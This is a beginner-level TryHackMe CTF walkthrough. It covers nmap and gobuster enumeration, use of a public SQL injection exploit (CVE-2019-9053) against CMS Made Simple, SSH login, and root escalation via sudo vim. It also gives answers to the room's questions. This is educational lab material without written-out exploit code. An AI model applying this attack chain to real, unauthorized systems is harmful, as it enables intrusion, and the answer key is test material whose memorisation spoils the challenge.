Simple CTF is just that, a beginner-level CTF on TryHackMe that showcases a few of the necessary skills needed for all CTFs to include scanning and enumeration, research, exploitation, and privilege escalation.
Enjoy the room!
Let’s kick off the room with a scan I do on every room, nmap.
From our results, we can see ports 21 (FTP), 80 (HTTP), and 2222 (SSH) are open.
How many services are running under port 1000?
Answer: 2
What is running on the higher port?
Answer: SSH
Knowing there is a website being hosted let’s check it out for any additional information.
First, let’s just browse to the IP and see what we get.
We find it is the default Apache2 page, not much more to go off of here.
Next, we can use “gobuster” to scan the website for any additional pages.
Using the medium wordlist we supplied, gobuster was able to find there is a webpage at “/simple”. Let’s try browsing to it now and see what we find.
Here we can see this is a default page for something called “CMS Made Simple” and if we look in the bottom corner we can see it is version 2.2.8.
Let’s see if there is anything online about this particular version by simply going to Google and searching “CMS Made Simple 2.2.8 exploit”.
In our results, we see a page on Exploit-DB that matches our search and refers to a SQL injection attack utilizing CVE-2019–9053.
What’s the CVE you’re using against the application?
CVE-2019–9053
To what kind of vulnerability is the application vulnerable?
SQLi
Now we know the ports open on the target, an idea of what the target is running on their website, and a possible exploit that we may use.
The exploit is a python script so I copied and pasted into a .py document on my attack box.
Now let’s try to run it and see what we get in return. Usually, if you don’t know the syntax you can run the script without any arguments and it will give you some information on what to enter.
Here we can see we need to supply a URL using the -u flag and can supply a wordlist for password cracking using — crack -w.
Now, let’s run it and see what we get in return.
(Note: Initially the script would not run due to my machine not having “termcolor” module installed for Python. To fix: pip install termcolor
)
Bingo! We got a username and a cracked password returned from the exploit.
What’s the password?
secret
Where can you login with the details obtained?
SSH
Using the username and password we discovered we can now try to SSH into the target machine.
Now if we ls we see the “user.txt” file and read it for our first flag!
What’s the user flag?
user.txt
Next let’s check if any other users have home directories.
Is there any other user in the home directory? What’s its name?
sunbath
On to privileged escalation! First I like to start off with running “sudo -l” to see what my current user can run.
We can see the user “mitch” can run /usr/bin/vim without a password. With that information, let’s check out GTFOBins and see if we can use that for privesc.
Looks like if we run this command here we can escalate our privileges!
What can you leverage to spawn a privileged shell?
vim
It worked! From here all we have left is to grab the root flag and the room is complete.
What’s the root flag?
root.txt
Congrats!
Overall easy but good room as it introduced us to using nmap and gobuster, doing some research on exploits and finding one that works for us, checking out GTFOBins, and finally escalating to root to get the final flag.